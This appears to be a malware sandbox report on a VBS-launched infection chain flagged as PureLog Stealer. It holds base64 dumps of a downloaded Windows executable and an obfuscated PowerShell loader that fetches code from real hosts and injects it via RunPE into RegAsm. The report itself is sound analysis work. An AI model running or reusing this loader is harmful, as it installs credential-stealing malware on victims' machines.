Date: Wed, 02 Oct 2024 03:23:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2823512
Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
Connection: close
ETag: "66e22cba-2b1558"
Strict-Transport-Security: max-age=15724800
Expires: Wed, 02 Oct 2024 09:23:17 GMT
Cache-Control: max-age=21600
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
                                              2024-10-02 03:23:17 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                              Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                              2024-10-02 03:23:18 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                              Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                              2024-10-02 03:23:18 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                              Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                              2024-10-02 03:23:18 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                              Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                              2024-10-02 03:23:18 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                              Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                              2024-10-02 03:23:18 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                              Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                              2024-10-02 03:23:18 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                              Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                              2024-10-02 03:23:18 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                              Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y



                                              Target ID:0
                                              Start time:23:23:12
                                              Start date:01/10/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs"
                                              Imagebase:0x7ff7bf320000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:23:23:13
                                              Start date:01/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                              Imagebase:0x7ff6eb350000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:23:23:13
                                              Start date:01/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff68cce0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:23:23:15
                                              Start date:01/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"
                                              Imagebase:0x7ff6eb350000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1834352585.000001C465BDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true
